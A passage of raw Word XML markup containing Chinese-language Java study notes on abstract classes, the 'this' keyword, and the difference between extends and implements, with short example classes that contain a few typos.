      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD68F91" w14:textId="4F31560F" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36B83A" w14:textId="7792A0D7" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public Integer getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76700045" w14:textId="1DA5AAB5" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       return id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA128A" w14:textId="650C22F3" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC482EB" w14:textId="156BD662" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public void setId(Integer id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A052E71" w14:textId="3828EF29" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E057B5" w14:textId="6A5E211B" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7974DF" w14:textId="2B4AA9BA" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public String getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79136B50" w14:textId="21E3629B" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       return name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508023D" w14:textId="5DD72641" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C1FD7" w14:textId="575E75B9" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public void setName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551062D3" w14:textId="4EF991E2" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E61410" w14:textId="1CA70863" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4008B0" w14:textId="0EB3A3FE" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>public abstractvoid eat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EC23A" w14:textId="21352405" w:rsidR="00912590" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361ADF90" w14:textId="3FFF5D98" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B67898" w14:textId="745E4B97" w:rsidR="00912590" w:rsidRDefault="00D0694E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际类可以集成抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E82470" w14:textId="44CACD4E" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656E5B21" w14:textId="30095FEC" w:rsidR="00061A79" w:rsidRDefault="00061A79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字指向当前对象本身</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以赋值给其他变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B795090" w14:textId="619519BD" w:rsidR="00061A79" w:rsidRDefault="00061A79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以调用当前类中的属性、普通方法和构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33330367" w14:textId="181465E1" w:rsidR="00912590" w:rsidRDefault="00061A79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当形参和成员变量名称一样的时候，可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA081E1" w14:textId="74A36416" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51664796" w14:textId="0D0E47A1" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class Student extends AbstactPerson {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE885F8" w14:textId="68EDFCF6" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private String school;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855D498" w14:textId="628D7C7F" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public Student(Integer id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413560A" w14:textId="59CE833C" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       super(id, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8857D" w14:textId="77777777" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185EDAB" w14:textId="77777777" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EE884C" w14:textId="4183011D" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public Student(Integer id, String name, String school) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C527A" w14:textId="4D9143A1" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this(id, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540D3DD" w14:textId="52BD6541" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this.school = school;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9DA8D" w14:textId="11CBCE7E" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C9DEE" w14:textId="5199BBF0" w:rsidR="00C76A07" w:rsidRPr="00746016" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC07E7" w14:textId="227730D9" w:rsidR="00C76A07" w:rsidRPr="00746016" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">   public void eat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1052A871" w14:textId="268A4B4B" w:rsidR="00C76A07" w:rsidRPr="00746016" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">       System.out.println("</w:t>
      </w:r>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在学校食堂吃饭</w:t>
      </w:r>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A886717" w14:textId="51618DD0" w:rsidR="00C76A07" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00746016">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43878B" w14:textId="2050A89F" w:rsidR="00912590" w:rsidRDefault="00C76A07" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207E7D9" w14:textId="54562DA6" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09220D87" w14:textId="7A6DADCF" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3785036A" w14:textId="70101CFE" w:rsidR="00AD3171" w:rsidRDefault="00AD3171" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB1E020" w14:textId="35353150" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B19969" w14:textId="6887DC9F" w:rsidR="00AD3171" w:rsidRDefault="00B023FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B023FA">
        <w:t>https://blog.csdn.net/weixin_39926749/article/details/114405556</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E079F9" w14:textId="3F27A896" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E889741" w14:textId="79DF2BA9" w:rsidR="0046701D" w:rsidRDefault="0046701D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85BC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85BC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是继承父类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85BC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>那个类不是声明为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85BC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85BC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就能继承，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420B8B7" w14:textId="44610B4A" w:rsidR="0046701D" w:rsidRDefault="0046701D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="005554AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不支持多重继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="005554AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以用接口来实现，这样就要用到</w:t>
      </w:r>
      <w:r w:rsidRPr="005554AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B60C0" w14:textId="655D7E9A" w:rsidR="00B023FA" w:rsidRDefault="0046701D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承只能继承一个类，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以实现多个接口</w:t>
      </w:r>
      <w:r w:rsidR="0010472F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="0010472F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidR="0010472F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用逗号分开就行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> class A extends B implements C, D, E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780343C" w14:textId="3C60CD2B" w:rsidR="00B023FA" w:rsidRDefault="00B023FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68ABCF9F" w14:textId="688396D9" w:rsidR="00B023FA" w:rsidRDefault="00810EF1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E97E06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接口只有定义，抽象类可以有定义和实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C28D3B" w14:textId="73B0F01D" w:rsidR="00B023FA" w:rsidRDefault="00B023FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F88703" w14:textId="2A61B33C" w:rsidR="00B023FA" w:rsidRDefault="000F2D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口的字段定义默认为：</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public static final</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，抽象类字段默认是”</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>friendly</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本包可见</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1239AB" w14:textId="698CB99B" w:rsidR="00912590" w:rsidRDefault="00912590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B955BC" w14:textId="192994F5" w:rsidR="00410399" w:rsidRDefault="00410399" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00410399">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接口可以继承接口</w:t>
      </w:r>
      <w:r w:rsidR="00EC3AE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r w:rsidR="00EC3AE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidR="00EC3AE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>；类实现接口使用</w:t>
      </w:r>
      <w:r w:rsidR="00EC3AE8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B56622" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public inerface Runner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C2FEB" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E673717" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  int ID = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B95CB4" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  void run ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2615DE" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221D37F" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>interface Animal extends Runner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB6D8D" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F669FD3" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  void breathe ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E472E" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD8E58" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Fish implements Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DAAF9D" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61901EBB" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public void run ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7E025" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EE114" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   System.out.println("fish is swimming");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED9D01" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACCFA8" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void breather()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A744E3" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A95C1" w14:textId="77777777" w:rsidR="00163A8D" w:rsidRDefault="00163A8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   System.out.println("fish is bubbing");</w:t>
      </w:r>
    </w:p>
